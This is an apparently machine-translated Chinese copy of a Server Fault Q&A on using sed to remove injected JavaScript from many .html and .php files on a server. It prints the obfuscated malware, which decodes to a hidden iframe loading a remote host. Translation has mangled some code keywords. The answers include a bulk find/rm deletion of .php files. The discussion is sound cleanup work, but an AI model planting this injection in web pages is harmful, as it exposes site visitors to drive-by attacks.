Linux

如何使用 sed 刪除多個文件中的惡意軟體程式碼?

  • October 5, 2018

我在伺服器上的許多 .html 和 .php 文件中都有這個惡意軟體程式碼。我需要使用刪除它們

  • sed -i expression
  • 搜尋目錄下的所有文件/home/
  • 查找受感染的文件
  • 通過用空格替換程式碼來刪除程式碼

VAR usikwseoomg =‘PaBUTyjaZYg3cPaBUTyjaZYg69PaBUTyjaZYg66’; VAR nimbchnzujc =‘PaBUTyjaZYg72’; VAR szwtgmqzekr =‘PaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg20PaBUTyjaZYg6ePaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg3dPaBUTyjaZYg22’; VAR yvofadunjkv =‘PaBUTyjaZYg6dPaBUTyjaZYg67PaBUTyjaZYg79PaBUTyjaZYg65PaBUTyjaZYg64PaBUTyjaZYg61PaBUTyjaZYg67PaBUTyjaZYg70PaBUTyjaZYg7aPaBUTyjaZYg63PaBUTyjaZYg76’; VAR ylydzxyjaci =‘PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg77PaBUTyjaZYg69PaBUTyjaZYg64PaBUTyjaZYg74PaBUTyjaZYg68PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg31PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg68PaBUTyjaZYg65PaBUTyjaZYg69PaBUTyjaZYg67PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22’; VAR xwojmnoxfbs =‘PaBUTyjaZYg20PaBUTyjaZYg73PaBUTyjaZYg72PaBUTyjaZYg63PaBUTyjaZYg3dPaBUTyjaZYg22’; VAR mgsybgilcfx =‘PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg74PaBUTyjaZYg70PaBUTyjaZYg3aPaBUTyjaZYg2fPaBUTyjaZYg2f’; VAR nixyhgyjouf =‘koska.sytes.net/phl/logs/index.php’;var nesrtqwuirb =’’;VAR rqchyojemkn =‘PaBUTyjaZYg6dPaBUTyjaZYg67PaBUTyjaZYg79PaBUTyjaZYg65PaBUTyjaZYg64PaBUTyjaZYg61PaBUTyjaZYg67PaBUTyjaZYg70PaBUTyjaZYg7aPaBUTyjaZYg63PaBUTyjaZYg76’; VAR niupgeebkhf =’’; VAR yyzsvtbnudd =‘PaBUTyjaZYg3cPaBUTyjaZYg2fPaBUTyjaZYg69PaBUTyjaZYg66’;var tlclvgxfthn = ‘PaBUTyjaZYg72PaBUTyjaZYg61’; var zxttbudjafh = ‘PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg3e’; var yydszqnduko = 新數組 (); yydszqnduko$$ 0 $$=新數組(usikwseoomg+nimbchnzujc+szwtgmqzekr+yvofadunjkv+ylydzxyjaci+xwojmnoxfbs+mgsybgilcfx+nixyhgyjouf+nesrtqwuirb+rqchyojemkn+niupgeebkhf+yyzsvtbnudd+tlclvgxfthn+zxttbudjafh);文件$$ ‘PaBUTyjaZYgwPaBUTyjaZYgrPaBUTyjaZYgiPaBUTyjaZYgtPaBUTyjaZYgePaBUTyjaZYg’.replace(/PaBUTyjaZYg/g,’’) $$(窗戶$$ ‘PaBUTyjaZYguPaBUTyjaZYgnPaBUTyjaZYgePaBUTyjaZYgsPaBUTyjaZYgcPaBUTyjaZYgaPaBUTyjaZYgpPaBUTyjaZYgePaBUTyjaZYg’.replace(/PaBUTyjaZYg/g,’’) $$(yydszqnduko.toString ().replace (/PaBUTyjaZYg/g, ‘%’)));

我認為這可以做到:

find /home \( -name "*.html" -o -name "*.php" \) -exec sed -i.bak 's/<script.*PaBUTyjaZYg.*script>//g' \{\} \;

來自評論“刪除所有文件的名稱和副檔名為 .php”

find /home -name "*[0-9]*.php" -exec rm \{\} \;

但首先,使用 echo 而不是 rm 執行它,以確保不會刪除不想刪除的內容。

我想說一個更好/更安全的解決方案是從乾淨的備份中恢復這些文件。

引用自:https://serverfault.com/questions/157538

相關問答

Linux

如何從 lshw 輸出中獲取 bash shell 中的所需值?

  • May 8, 2015
檢視問答
Linux

如何刪除文件中標記的文本塊?

  • February 9, 2013
檢視問答
Linux

查找文本,然後在多個文件中插入換行符和一 些 php 程式碼

  • April 10, 2012
檢視問答
Linux

SED 查找和替換 w 正則表達式

  • August 5, 2009
檢視問答
Linux

如何從文件中提取值,將其與變數進行比較並發送到輸出文件

  • October 1, 2022
檢視問答
Curl

如何使用 curl 和 grep / sed 從網站中提取版本號?

  • July 7, 2022
檢視問答